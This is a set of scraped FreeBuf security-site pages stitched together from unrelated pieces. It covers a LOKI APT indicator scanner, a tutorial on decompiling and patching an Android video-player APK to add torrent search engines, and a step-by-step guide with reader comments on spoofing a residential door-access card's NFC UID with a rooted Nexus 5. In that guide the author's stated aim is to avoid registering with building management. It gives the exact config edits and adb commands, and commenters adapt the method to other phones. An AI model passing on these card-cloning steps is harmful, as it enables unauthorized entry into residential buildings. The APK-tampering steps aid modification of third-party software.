
    加个主动防御。

    亮了(0)
  • Netf?2014-05-09回复7楼

    杀毒软件的目的在于防止黑客侵入电脑。但如今不管有没有杀毒软件的保护,黑客常常会侵入电脑。这句亮了。

    亮了(0)
  • 方坤-Summer?2014-05-09回复8楼

    一项重大的工程

    亮了(0)
  • 郑纯真_GYQ?2014-05-09回复9楼

    三大纷纷被收购的节奏。。

    亮了(0)
  • FlairanWang?2014-05-09回复10楼

    这种思路终于对了。信息安全就是一场博弈,博弈“静态知识”的时代早就过了

    亮了(0)
  • 廣漠李博倫?2014-05-09回复11楼

    所以一直裸机运行…

    亮了(0)
  • Netf?2014-05-09回复12楼

    估计你的电脑什么毒都有。

    亮了(0)
  • firsthoo?2014-05-10回复13楼

    转发微博

    亮了(0)
表情插图

取消

Mystery

Mystery

肆零叁文化传媒 COO

39 篇文章282 条评论

相关阅读

  • 亚洲诚信与腾讯云达成战略合作 携手共建安全云生态
  • 赛门铁克发布2014年安全趋势,大数据、云等均上榜
  • 赛门铁克(Symantec)发布2016年2月威胁情报报告
  • 首款基于“深度学习”的手机安全软件问世,号称可抵御0day攻击
  • 活在Web流量完全加密的世界里:FreeBuf专访赛门铁克全球高级业务发展总监Dean Coclin

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中…

0daybank

loki

loki

投稿

LOKI:一款APT威胁指标扫描软件

clouds2016-08-30239324人围观 ,发现 14 个不明物体工具

24251594622_e70c7947ca.jpg

LOKI是一款APT入侵痕迹扫描软件,以入侵威胁指标(IOC)和黑客工具特征为对象,发现入侵事件和痕迹,其内置的指标特征来自公开发布的事件报告、取证分析和恶意样本等。LOKI由德国信息安全公司Bsk-Consulting开发。

LOKI GitHub:

https://github.com/Neo23x0/Loki

LOKI支持以下四种检测模式:

*匹配文件路径和文件名的IOC检测

*匹配文件数据和进程内存的YARA恶意软件规则检测

*匹配已知恶意软件的MD5 /SHA1/SHA256哈希值检测

*匹配C&C终端连接的网络检测

其它方式检测:

*进程异常检测(基于sysforensics)

*SWF压缩文件检测

*SAM转储检测

*Regin木马文件检测(使用命令 -reginfs)

运行:

(1)克隆LOKI的github库(如果只是下载ZIP文件,请记得下载IOC特征签名子库 signature-base)

(2)提供扫描对象(移动介质、网络共享、文件夹等)

(3)以管理员方式按照命令运行loki.exe

2016-08-27_163825.jpg

LOKI内置的威胁特征库(IOC):

*“方程式组织”Equation Group APT恶意样本-(包括哈希值、卡巴斯基分析的YARA规则和10个通用规则)

*Carbanak APT-卡巴斯基分析的恶意样本哈希值和文件名IOC

*Arid Viper APT-趋势科技分析的恶意样本哈希值

*Regin恶意软件(GCHQ/NSA/FiveEyes相关)-其中的Legspin和Hopscotch模块IOC

*QUERTY 恶意软件(FiveEyes相关)-键盘记录模块IOC

*Skeleton Key APT(国家支持攻击相关)-恶意软件IOC

*WoolenGoldfish APT-SHA1哈希值和YARA规则

*OpCleaver APT(伊朗相关APT活动)-IOC

*其它180多个黑客工具YARA规则

*其它600多个网页后门YARA规则

*大量匹配的可疑文件签名

*……

LOKI收费版:

LOKI的收费版本软件THOR,规则库更强大,扫描功能更深入,请参考THOR

THOR_Overview_en_2-620x338.png

*本文译者:clouds,编译来源:Securityblog,转载须注明来自FreeBuf.COM

这些评论亮了

  • JAZ123321(3级)回复
    不错的扫描软件
    )8(亮了
发表评论

已有 14 条评论

  • JAZ123321?(3级)?2016-08-30回复1楼

    不错的扫描软件

    亮了(8)
  • langyajiekou?(5级)?2016-08-30回复2楼

    提供扫描对象(移动介质、网络共享、文件夹等),是针对文件系统而不是针对机器?

    亮了(4)
  • 死宅10086?(6级)?2016-08-30回复3楼

    看看 :cool:

    亮了(5)
  • 鬼魅羊羔?(4级)网络尖刀的小屌丝一枚。?2016-08-30回复4楼

    感觉不错,正在测试中。。。看看效果如何。。。

    亮了(4)
    • 墨霝?(2级)?2017-01-12回复

      @ 鬼魅羊羔? 前辈,能问一下安装环境么?

      亮了(1)
  • 看雪网友?2016-08-30回复5楼

    洛基?看来要开发个叫Thor的防护软件

    亮了(5)
  • kurt_nan?(1级)?2016-08-30回复6楼

    咋一看还以为只有windows平台能用呢 :mrgreen:

    亮了(4)
    • 鬼魅羊羔?(4级)网络尖刀的小屌丝一枚。?2016-08-30回复

      @ kurt_nan? linux平台能用?我这好几个Python2.6和2.7都不行啊。。

      亮了(2)
      • langfeng?(1级)安全的本质是信任,安全的表现是攻防。?2016-08-31回复

        @ 鬼魅羊羔? 我也试了,运行报错,感觉用不了

        亮了(2)
      • 鬼魅羊羔?(4级)网络尖刀的小屌丝一枚。?2016-08-31回复

        @ langfeng? 感觉这东西扫描巨慢。。。巨慢。。。

        亮了(2)
  • hela?2016-08-31回复7楼

    这么取名Marvel同意了吗

    亮了(3)
  • topses?(1级)?2016-09-01回复8楼

    关键是如何只输出[ALERT]告警信息呢?

    亮了(0)
  • 鬼魅羊羔?(4级)网络尖刀的小屌丝一枚。?2016-09-01回复9楼

    optional arguments:
    -h, –help show this help message and exit
    -p path Path to scan
    -s kilobyte Maximum file site to check in KB (default 2000 KB)
    –printAll Print all files that are scanned
    –noprocscan Skip the process scan
    –nofilescan Skip the file scan
    –noindicator Do not show a progress indicator
    –debug Debug output

    参数翻译:
    可选参数:
    -l 路径,log日志输出位置;例如:-l c:\scan.log
    – h,-帮助显示这个帮助信息和退出
    – p,扫描路径路径,例如:loki.exe -p c:\windows\system32\
    – s ,检查的最大文件值(默认2000 KB)
    –printAll,打印所有文件扫描
    –noprocscan,跳过扫描过程
    –nofilescan,跳过文件扫描
    –noindicator,不显示进度指示器
    –debug,调试调试输出

    亮了(0)
  • 墨霝?(2级)?2017-01-12回复10楼

    用不了,各种环境。。各种坑,有人成功么?

    亮了(0)
表情插图

取消

clouds

clouds

I am a robot ,do not talk to me ,code to me.

135 篇文章35 条评论

相关阅读

  • APT防御的他山石—思科内部安全团队解读APT
  • 卡巴斯基辣评2016安全趋势:APT攻击将死,“后门买卖”会更加活跃
  • FireEye:数字面包屑 – 识别APT攻击来源的7大线索
  • 中国黑客被指责曝光了450万患者的信息
  • 探寻APT的化学本质与破解之术

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中…

0daybank

{searchterms}

{searchterms}

投稿

技术宅打造全能美剧播放器

Yaseng2014-04-12+6106789人围观 ,发现 11 个不明物体其他极客

1:前言

看到有同仁发《权力的游戏》自动追剧脚本,老衲也来凑个热闹…

移动端最好的播放器非云播君莫属了,极速而方便,高清而无码,可惜最近资源被和谐,每次有美剧更新需要用浏览器手工添加播放源或者pc端添加,很是麻烦的说。于是就简单diy了下云播1.9 for Android ,使其支持自定义搜索引擎(比如人人影视,xxx资源站等),并且修复了原来搜索结果列表页标题的bug,为了迎接Game of Thrones Season 4 的回归,特记录下修改过程。

2:添加yyets.com搜索引擎

反编译搜索引擎代码
com\xunlei\cloud\action\search\AdviseEngine.java ?89 行

try
????{
??????str?=?SearchAdviceEngineListResp.getDomainName(paramString);
??????if?(str.equalsIgnoreCase("btdigg.org"))
??????{
????????localAdviseEngine.url_pattern?=?"http://btdigg.org/search?q={searchTerms}&p={page}";
????????localAdviseEngine.multi_page?=?true;
????????localAdviseEngine.page_start_point?=?0;
????????return?localAdviseEngine;
??????}
??????if?(str.equalsIgnoreCase("so.com"))
??????{
????????localAdviseEngine.url_pattern?=?"http://www.so.com/s?q={searchTerms}+site%3Abtdigg.org&pn={page}";
????????localAdviseEngine.multi_page?=?true;
????????localAdviseEngine.page_start_point?=?1;
????????return?localAdviseEngine;
??????}
????}
????catch?(URISyntaxException?localURISyntaxException)
????{
??????localURISyntaxException.printStackTrace();
??????return?localAdviseEngine;
????}
????if?(str.equalsIgnoreCase("torrentkitty.com"))
????{
??????localAdviseEngine.url_pattern?=?"http://www.torrentkitty.com/search/{searchTerms}/{page}";
??????localAdviseEngine.multi_page?=?true;
??????localAdviseEngine.page_start_point?=?1;
??????return?localAdviseEngine;
????}
????if?(str.equalsIgnoreCase("kuaichuanmirror.com"))
????{
??????localAdviseEngine.url_pattern?=?"http://www.kuaichuanmirror.com/search/{searchTerms}/";
??????localAdviseEngine.multi_page?=?false;
??????localAdviseEngine.page_start_point?=?1;
????}

挖槽 ?竟然内置四大毛片搜索引擎 !!!
随便改掉一个即可
由于内置引擎只识别磁力链接 需要一个脚本文件来做中转(代码见最后链接)
输出格式为

magnet:?xt=urn:btih:hash1&title1</br>
magnet:?xt=urn:btih:hash2&title2</br>

修改 smali\com\xunlei\cloud\action\search\AdviseEngine.smali ? 239 行

.line?127?
:cond_1?
const-string?v2,?"yyets.com"?
invoke-virtual?{v0,?v2},?Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z?
move-result?v2?
if-eqz?v2,?:cond_2?
.line?128?
const-string?v0,?"http://www.ttst.com/y2c.php?keyword={searchTerms}&page={page}"?
iput-object?v0,?v1,?Lcom/xunlei/cloud/action/search/AdviseEngine;->url_pattern:Ljava/lang/String;
.line?129?
const/4?v0,?0x1

3:修正标题bug

云播在使用第三方搜索引擎时,发现结果列表页面的标题全部是随机的字符串

查看对应的dalvik代码
smali\com\xunlei\cloud\action\search\AdviseEngine.smali? ?990行

const-string?v0,?"magnet:\\?xt=urn:btih:([A-Za-z\\d]{32,})&?"??????//批量正则???遍历结果数组
??.....
?invoke-static?{v0,?v1},?Ljava/util/regex/Pattern;->compile(Ljava/lang/String;I)Ljava/util/regex/Pattern;
?.....
?invoke-virtual?{v5},?Ljava/util/regex/Matcher;->find()Z
move-result-object?v0
?.line?88
?invoke-virtual?{v0},?Ljava/lang/String;->length()I
move-result?v1
add-int/lit8?v1,?v1,?-0x1
?invoke-virtual?{v0,?v1},?Ljava/lang/String;->charAt(I)C?
move-result?v1
.line?89
const/16?v6,?0x26
if-ne?v1,?v6,?:cond_4
.line?90
invoke-virtual?{v0},?Ljava/lang/String;->length()I
move-result?v1
add-int/lit8?v1,?v1,?-0x1
invoke-virtual?{v0,?v3,?v1},?Ljava/lang/String;->substring(II)Ljava/lang/String;
?move-result-object?v0
????move-object?v1,?v0
????.line?92
????:goto_1
????const/16?v0,?0x14
????invoke-virtual?{v1},?Ljava/lang/String;->length()I
????move-result?v6
????invoke-virtual?{v1,?v0,?v6},?Ljava/lang/String;->substring(II)Ljava/lang/String;
????move-result-object?v0
????.line?93
????invoke-static
?{v0,?v2},?
Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;I)Ljava/lang/String;
?//?str2.substring(20,?str2.length())
????move-result-object?v6
?......
.line?105?
iput-object?v6,?v0,?Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
.line?106?
?iput-object?v1,?v0,?Lcom/xunlei/cloud/action/search/SnifferData;->url:Ljava/lang/String;
.line?107?
?iput-object?v6,?v0,?Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;

可以看到,标题被直接赋值给 ?magnet 的 hash 了 ?…..
修改为

ArrayList?localArrayList?=?new?ArrayList();
??Matcher?localMatcher?=?Pattern.compile(".*?</br>",?2).matcher(???//中转脚本每行用</br>?分割
????paramString);
??if?(!localMatcher.find())?{
???return;
??}
??String?str1;
??str1?=?localMatcher.group();
??for?(String?str2?=?str1.substring(0,?60);;?str2?=?str1)?{
???String?str3?=?str2.substring(20,?60);
???String?str4?=?str1.substring(61,?str1.length()?-?5);
???SnifferData?localSnifferData?=?new?SnifferData();
???localSnifferData.title?=?str4;
???localSnifferData.url?=?str2;
???localSnifferData.hash?=?str3;
???localArrayList.add(localSnifferData);
???break;
??}

对应的dalvik 代码(具体见后面链接)

locals?15?//15个寄存器
const-string?v0,?".*?</br>"
const/4?v10,?0x0
const/16?v11,?0x3c?//?60
const/16?v12,?0x3d?//61
const/4?v1,?0x2
invoke-static?{v0,?v1},?Ljava/util/regex/Pattern;->compile(Ljava/lang/String;I)Ljava/util/regex/Pattern;
move-result-object?v0
invoke-virtual?{v0,?v10,?v11},?Ljava/lang/String;->substring(II)Ljava/lang/String;
??????????????????????????????????????????????????????????????????????????????????????????????????????????????
move-result-object?v8
move-object?v1,?v8
??????????????????????????????????????????????????????????????????????????????????????????????????????????????
.line?92
:goto_1
move-object?v9,?v0?????//?copy?一份v0???magnet:?xt=urn:btih:hash&title
const/16?v0,?0x14
??????????????????????????????????????????????????????????????????????????????????????????????????????????????
invoke-virtual?{v1},?Ljava/lang/String;->length()I
??????????????????????????????????????????????????????????????????????????????????????????????????????????????
........
new-instance?v0,?Lcom/xunlei/cloud/action/search/SnifferData;
invoke-direct?{v0},?Lcom/xunlei/cloud/action/search/SnifferData;-><init>()V
invoke-virtual?{v9},?Ljava/lang/String;->length()I
move-result?v13
add-int/lit8?v13,?v13,?-0x5
invoke-virtual?{v9,?v12,?v13},?Ljava/lang/String;->substring(II)Ljava/lang/String;
move-result-object?v14
.line?105
iput-object?v14,?v0,?Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
??????????????????????????????????????????????????????????????????????????????????????????????????????????????
.line?106
iput-object?v1,?v0,?Lcom/xunlei/cloud/action/search/SnifferData;->url:Ljava/lang/String;
??????????????????????????????????????????????????????????????????????????????????????????????????????????????
.line?107
iput-object?v6,?v0,?Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;

4:回编译错误处理

java?-jar?apktool.jar?b?CloudPlay_ybappgw?c1.apk
libpng?error:?Not?a?PNG?file
ERROR:?Failure?processing?PNG?image?F:\Pentest\Ya?
Tools\pendroid\apktool1.5.2\CloudPlay_ybappgw\res\drawable-hdpi\local_list_view_item_color.png

不是真正的png文件??看了下文件头??bmp…??改过来 继续

ERROR:?9-patch?image?F:\Pentest\Ya?
Tools\pendroid\apktool1.5.2\CloudPlay_ybappgw\res\drawable-hdpi\progressbar_local_item.9.png
malformed.

把三个文件全部改成普通 png格式 progressbar_local_item.9.png => progressbar_local_item.png

apktool?b?CloudPlay_ybappgw?c1.apk
I:?Checking?whether?sources?has?changed...
I:?Smaling...
I:?Checking?whether?resources?has?changed...
I:?Building?apk?file...

成功编译成apk 文件

5:测试结果

签名? 安装到手机

java?-jar?signapk.jar?testkey.x509.pem?testkey.pk8?c1.apk?c1_s.apk
adb?install?-r?c1_s.apk

截图

6:链接

中转脚本: ?? https://github.com/yaseng/pentest/blob/master/project/diy_cloudplay/y2c.php
g.smali ? ?: https://github.com/yaseng/pentest/blob/master/project/diy_cloudplay/g.smali
smali 语法 : https://code.google.com/p/smali/w/list
Av Top 10: ? http://movie.douban.com/doulist/3822549

这些评论亮了

  • topsex大哥组(1级)回复
    ?
    )9(亮了
  • sex8回复
    ? 好福利啊
    )7(亮了
  • 宅娘回复
    acgcomic.com
    )6(亮了
发表评论

已有 11 条评论

  • topsex大哥组?(1级)?2014-04-12回复1楼

    :eek:

    亮了(9)
  • 宅娘?2014-04-12回复2楼

    acgcomic.com

    亮了(6)
    • green hat?2014-05-06回复

      @宅娘 这是什么打不开

      亮了(1)
  • WeirdBird007?(3级)干过开发,日过渗透,某乙方渗透>_< ‘…?2014-04-12回复3楼

    我去.. 居然有 so.com = = 这个 能搜 ?

    亮了(5)
  • 技术宅?(1级)?2014-04-12回复4楼

    我肯定不是我打造的虽然我是技术宅~

    亮了(2)
  • 佟曉輝同學?2014-04-12回复5楼

    转发微博

    亮了(0)
  • GeminiDylan?2014-04-12回复6楼

    膜拜

    亮了(0)
  • 麦田一根葱?2014-04-14回复7楼

    :eek: 惊呆了

    亮了(1)
  • sex8?2014-04-15回复8楼

    :!: 好福利啊

    亮了(7)
  • 猫友?(1级)?2014-07-23回复9楼

    惊呆了

    亮了(0)
  • 老司机?2016-03-26回复10楼

    就这样不知不觉的开了一趟车,连我都自叹不如。

    亮了(0)
表情插图

取消

Yaseng

Yaseng

看毛片 www.yaseng.me

4 篇文章2 条评论

相关阅读

  • 有才!网友制作的Freebuf壁纸(更新)
  • 美国军方确认存在“钢铁侠武器套装”
  • freebuf安全周刊2012年5月28日-6月3日
  • Wifi密码破解实战
  • 关于“RFID破解两三事”的一些事

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中…

0daybank

nexus 5

nexus 5

投稿

如何利用Nexus 5伪造一张门禁卡

seudingo2015-10-052560216人围观 ,发现 87 个不明物体头条极客

文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!

0×00 前言

我租住的杭州一个老小区一年前出现了所谓的“出租房杀人事件”,事件过后民警叔叔们给小区的每个单元都装上了门禁,所有住户都需要在物业处登记,物业的工作人员会让你提供身份证或者公交卡用来注册,注册之后就可以刷卡进门了。

但由于某些原因,我并不想去登记注册一张门禁卡,正好手头有一部nexus5,众所周知nexus5是有nfc功能的,我便想能不能用nexus5的nfc功能伪造一张门禁卡呢? 一番尝试之后,就有了下文的方法。 (从来没接触过无线安全,对Proxmark3,acr122u 等设备也是一窍不通,各位大牛见笑了)

0×01分析

由于身份证,公交卡等很多卡都可以用来当门禁卡,那基本上有九成把握这个门禁只是简单读取卡的id,并不会去解密里面的内容,只要简单模拟一个相同id的卡就可以刷开门禁。

0×02“采样”

我们下载一款名为“TagInfo”的android应用,用它来读取一下现在可以刷开门禁的卡信息。(跟同楼的妹子借的)

如下图:

卡的id为:D2:69:76:5B

接着我们找另一台nexus5看一下手机原来的id,扫描出来这台nexus5的id是在不停变化的,如下图:

原来出于安全考虑,android手机的id是一个4个字节长度的随机id,每次连接都会变化,并且都以 “0×80”开头。

android官方并没有提供任何的api可以指定修改nfc的id,但是我们可以用直接修改配置文件的方式来实现,前提当然是手机必须root过了。

0×03Just Do IT

1、到手机的 /etc/ 目录找一个文件名为libnfc-brcm-20791b05.conf,默认情况下,文件中NFA_DM_START_UP_CFG 的配置项是这样的值:

{45:CB:01:01:A5:01:01:CA:17:00:00:00:00:06:00:00:00:00:0F:00:00:00:00:E0:67:35:00:14:01:00:00:10:B5:03:01:02:FF:80:01:01:C9:03:03:0F:AB:5B:01:00:B2:04:E8:03:00:00:CF:02:02:08:B1:06:00:20:00:00:00:12:C2:02:00:C8}

2、通过修改这个值就可以改变id。把该文件下载到电脑上,先在最后面增加一个0×33作为标志位,接着接上要指定的id长度,在当前的情况下就是0×04,最后在后面接上要制定的id:“0xD2,0×69,0×76,0x5B”,接着改变最首的数字,加上我们总共增加的字符串长度,这里我们需要加上6,所以最后配置项变成:

{4B:CB:01:01:A5:01:01:CA:17:00:00:00:00:06:00:00:00:00:0F:00:00:00:00:E0:67:35:00:14:01:00:00:10:B5:03:01:02:FF:80:01:01:C9:03:03:0F:AB:5B:01:00:B2:04:E8:03:00:00:CF:02:02:08:B1:06:00:20:00:00:00:12:C2:02:00:C8:33:04:D2:69:76:5B}

3、采用adb的方式覆盖系统中原来的文件,然后重启

adb?root
adb?remount
adb?push?libnfc-brcm-20791b05.conf?/etc/
adb?reboot

重启之后我们发现,这台nexus5的id已经被改成了我们想要的。

 

 

拿着修改好的nexus5去试试看?记得必须在唤醒屏幕的情况下nfc才有效。

0×04 演示视频

成功!

另外,其它手机可以参考:http://bar.freebuf.com/comment/8783 这里的讨论。

*参考来源: STA /dingody编辑整理,转载请注明来自黑客与极客(FreeBuf.com)

这些评论亮了

  • ZMOM1031回复
    其实在手机和读卡器中间放一张NFC卡,在特定情况下会起到穷举的效果
    )31(亮了
  • dawner回复
    请注明出处:http://stackoverflow.com/a/28720342/1016460
    )22(亮了
  • 不脱也火回复
    我有Nexus 5,我想刷卡不要钱,我回去就做
    )14(亮了
  • Glaucus回复
    非奶5的NFC手机表示没找到etc下的那个文件
    )12(亮了
  • FLY(1级)回复
    @ dawner 您好,我想请教一下,小米3能实现上面的功能吗?小米3也带NFC 也有libnfc-brcm-20791b05.conf这个文件
    )10(亮了
发表评论

已有 87 条评论

  • 不脱也火?2015-10-05回复1楼

    我有Nexus 5,我想刷卡不要钱,我回去就做

    亮了(14)
    • dawner?2015-10-05回复

      楼主的方法适用于 Broadcom BCM20793 NFC 芯片,但是这款芯片不支持 Mifare Classic
      能够模拟任意 UID 只能对付使用 M1 卡的门禁,而不能模拟 M1 卡内容,更没法消费

      亮了(9)
      • FLY?(1级)?2015-10-06回复

        @ dawner 您好,我想请教一下,小米3能实现上面的功能吗?小米3也带NFC 也有libnfc-brcm-20791b05.conf这个文件

        亮了(10)
      • FLY?(1级)?2015-10-06回复

        @ dawner 我测试了,小米3能用,并且不用唤醒屏幕就能用。

        亮了(6)
      • csxy?2015-10-06回复

        @ FLY? 你的文件怎么修改按楼主的一模一样吗?

        亮了(6)
      • FLY?(1级)?2015-10-07回复

        @ csxy 恩,就是按照楼主上面说的修改的

        亮了(7)
      • good_kid?(1级)?2015-10-10回复

        @ FLY? 对的,因为他是抄的所以说必须点亮屏幕,其实NFC重要的特点就是静默条件下的使用。

        亮了(6)
      • bluesky139?2015-10-25回复

        @ dawner 话说公交刷卡也只拿ID么?可不可能实现手机模拟去刷?

        亮了(4)
      • 胡杨?2016-04-14回复

        @ FLY? 怎么做到的?能给我具体说说吗?发到我的邮箱,2821903968@qq.com

        亮了(4)
      • 121?2017-04-11回复

        @ FLY? 我的是米3.正在研究中,求帮助

        亮了(0)
  • 叶良辰?2015-10-05回复2楼

    我家的门能打开吗? :mrgreen:

    亮了(6)
  • Glaucus?2015-10-05回复3楼

    非奶5的NFC手机表示没找到etc下的那个文件

    亮了(12)
    • FLY?(1级)?2015-10-06回复

      @ Glaucus 小米3 有这个文件

      亮了(5)
    • 0xroot?(6级)奔跑的蚂蚁?2015-10-06回复

      @ Glaucus 找libnfc-brcm.conf

      亮了(6)
  • cc_胏艈?2015-10-05回复4楼

    这个可以啊

    亮了(7)
  • ZMOM1031?2015-10-05回复5楼

    其实在手机和读卡器中间放一张NFC卡,在特定情况下会起到穷举的效果

    亮了(31)
    • FLY?(1级)?2015-10-11回复

      @ ZMOM1031 能详细说一下吗?

      亮了(6)
  • Yuuki_ai?2015-10-05回复6楼

    试试 看看可以不

    亮了(5)
  • micki?2015-10-05回复7楼

    理论上是不是支持nfc的手机都可以?

    亮了(8)
  • dawner?2015-10-05回复8楼

    请注明出处:http://stackoverflow.com/a/28720342/1016460

    亮了(22)
    • 清风987?(1级)?2015-10-05回复

      @ dawner 层主大神哈,你是怎么发现的????

      亮了(5)
  • dawner?2015-10-05回复9楼

    以及出处的出处:http://stackoverflow.com/a/28360190/1016460

    楼主只有故事是原创

    亮了(5)
    • 0xroot?(6级)奔跑的蚂蚁?2015-10-05回复

      @ dawner 也不能说是翻译 作者参考了国外的一些内容吧 毕竟人家也有自己的一些思路 然后亲手实践了一下

      亮了(4)
    • a?2015-10-07回复

      @ dawner nxp的nfc芯片能模拟m1吗

      亮了(5)
      • good_kid?(1级)?2015-10-10回复

        @ a M1是NXP的专利,所以应该只有他家或者他授权的厂家才能模拟的。

        亮了(3)
  • 守望II奥姆卡?2015-10-05回复10楼

    你好,请教一下,先在信息最后面增加一个0×33作为标志位 这是为什么?

    亮了(6)
  • 清风987?(1级)?2015-10-05回复11楼

    好吧。。。。。看完五楼大神的回复之后,感觉英文版的更详细一些果断英文版本了

    亮了(2)
  • eumenides_5272?2015-10-05回复12楼

    看到我啊啊啊

    亮了(2)
  • aaa?2015-10-05回复13楼

    也就是必须先找一个可以通过的卡,然后读取他的卡ID才可以复制一个一样的
    如果换一个门,那就要换一个单眼的住户的卡才行了?

    亮了(1)
  • HenryWang624?2015-10-05回复14楼

    [作揖]

    亮了(1)
  • grafu?2015-10-05回复15楼

    厉不厉害

    亮了(2)
  • _咋也不咋?2015-10-05回复16楼

    并没有看懂

    亮了(1)
  • MR_0010?2015-10-06回复17楼

    验证的密匙应该是默认密匙

    亮了(1)
  • Peanut Killer?2015-10-06回复18楼

    文中:“原来出于安全考虑,android手机的id是一个4个字节长度的随机id,每次连接都会变化,并且都以 “0×80”开头。”的”0×80″有错,应当是0×08.

    亮了(6)
  • syusa?(1级)?2015-10-06回复19楼

    NFA_DM_START_UP_CFG=

    {1F:CB:01:01:A5:01:01:CA:14:00:00:00:00:06:E8

    :03:00:00:00:00:00:00:00:00:00:00:00:00:00:80

    :01:01}

    这个是0X04 第一位怎么改啊 高手指点 怎么算的

    亮了(2)
    • n0w4ve5?(1级)?2015-10-08回复

      @ syusa? 1F换十进制16+15 十进制15+16+6=37 换十六进制=25

      25:CB:01…

      亮了(4)
      • 吖色?2016-06-12回复

        为什么一会十进制,一会十六进制,最终是十六进制吧

        亮了(1)
  • 哎哟妹妹的不错哦?2015-10-06回复20楼

    小区卡我倒试过。挺不错的

    亮了(3)
  • 小郎君?(1级)?2015-10-06回复21楼

    TagInfo的时候,很抱歉TagInfo已停止运行 是怎么回事啊?请指教

    亮了(2)
  • 撸迪?2015-10-06回复22楼

    小区卡我倒试过。挺不错的

    亮了(2)
  • csxy?2015-10-06回复23楼

    0×33标记位是什么作用,或者说可以把0×33换成别的

    亮了(1)
  • langyajiekou?(5级)?2015-10-06回复24楼

    一定要用ADB命令吗?用RE修改文件然后覆盖行不行呢?

    亮了(2)
    • csxy?2015-10-07回复

      @ langyajiekou? 我试了RE不行,用ADB就可以

      亮了(1)
      • langyajiekou?(5级)?2015-10-07回复

        @ csxy 我的死活不成功,每次Adb root都一直提示restarting adbd as root. 怎么都进不去。

        亮了(3)
      • n0w4ve5?(1级)?2015-10-08回复

        @ langyajiekou? root权限的文件管理器可以直接编辑 我用的cm自带

        亮了(2)
      • langyajiekou?(5级)?2015-10-08回复

        @ n0w4ve5? 我倒是root了再RE改的。但是貌似不行。不过手头没有第二部手机无法验证是否修改成功。唯一就是没有ADB上传。

        亮了(2)
      • t3rry1ng?(1级)?2015-10-10回复

        @ langyajiekou? 亲测RE改成功,不过升级系统后又复原了

        亮了(1)
  • 赵日天?2015-10-07回复25楼

    NFA_DM_START_UP_CFG={AA:80:01:01:B0:05:01:03:03:03:08:B5:03:01:03:FF:C9:0D:24:00:00:00:01:00:BB:00:E4:00:0A:01:02:D6:0D:00:02:02:00:00:00:00:01:00:01:59:00:85:B2:02:A1:05:C8:1E:06:1F:00:0A:09:30:00:04:24:00:1C:00:75:00:77:00:76:00:1C:00:03:00:0A:00:59:01:00:00:40:04:D7:01:07:DD:32:06:00:00:10:22:08:08:06:04:03:02:00:09:27:0A:72:20:00:74:20:00:00:00:01:85:00:00:32:1F:1D:1D:14:14:12:00:02:55:55:55:55:55:55:55:55:55:55:55:55:55:1D:CA:20:00:00:00:00:08:E8:03:00:00:90:01:00:00:FF:FF:00:00:00:00:00:00:00:00:00:00:00:20:14:01:00:00:00} 我的这么长 这么改?

    亮了(3)
    • FLY?(1级)?2015-10-07回复

      @ 赵日天 在最后面加上就行了,好好看看文中是怎么说的吧

      亮了(1)
      • 赵日天?2015-10-11回复

        @ FLY? 3Q

        亮了(1)
    • n0w4ve5?(1级)?2015-10-08回复

      @ 赵日天 仔细阅读…改完这串的最后几位 然后 AA+6

      亮了(1)
      • 赵日天?2015-10-11回复

        @ n0w4ve5? 我试试3Q

        亮了(1)
      • Sm_Han?2016-03-19回复

        @ n0w4ve5? 兄弟帮我改改. han_diannao_mi@126.com

        亮了(1)
  • 八路军?2015-10-07回复26楼

    tclp688l 这个在哪里修改没有找到

    亮了(1)
  • langyajiekou?(5级)?2015-10-07回复27楼

    libnfc-brcm-20791b04.conf 这个文件是干嘛的?

    亮了(1)
  • FFDDdevil?2015-10-08回复28楼

    躺着呢

    亮了(2)
  • 走走走走走走走走走去大理?2015-10-08回复29楼

    还没睡

    亮了(1)
  • 刘大虎?2015-10-08回复30楼

    Coool 刚发现三星系列手机也可以,其中NFA_DM_START_UP_CFG 存在libnfc-sec文件中。

    亮了(7)
    • taylorwin?(5级)?2015-10-08回复

      @ 刘大虎 三星什么型号呢?

      亮了(1)
    • 我纠结?2016-03-09回复

      @ 刘大虎 层主,三星的点开以后NFA_DM_START_UP_CFG,一共有两段?到底修改那一段呢?

      亮了(1)
  • xiaoming?2015-10-08回复31楼

    还是买个能模拟uid的卡片吧。淘宝5块钱。

    亮了(1)
  • 张_will?2015-10-08回复32楼

    玩过mifare classic tool,家里的门卡居然是加密的

    亮了(1)
  • 亢宇飞的微波?(1级)?2015-10-08回复33楼

    一加手机 cm12.1系统,读出来的id是01:02:03:04 求怎么改,按上述方法改会造成nfc无法打开

    亮了(3)
  • Sophie呗呗?(1级)?2015-10-09回复34楼

    不错 学习了

    亮了(3)
  • bawanag?(1级)?2015-10-09回复35楼

    怎么我的身份证没办法看到id??

    亮了(1)
  • 子曾曰不耻不若人何若人有?2015-10-09回复36楼

    其它型号的NFC手机可以参考 这篇文章进行修改

    亮了(1)
  • M1sT4k3r?2015-10-09回复37楼

    回头试试。

    亮了(1)
  • 玉殷痕?2015-10-09回复38楼

    越狱!

    亮了(1)
  • 云起涟漪YUNQILIANYI?2015-10-09回复39楼

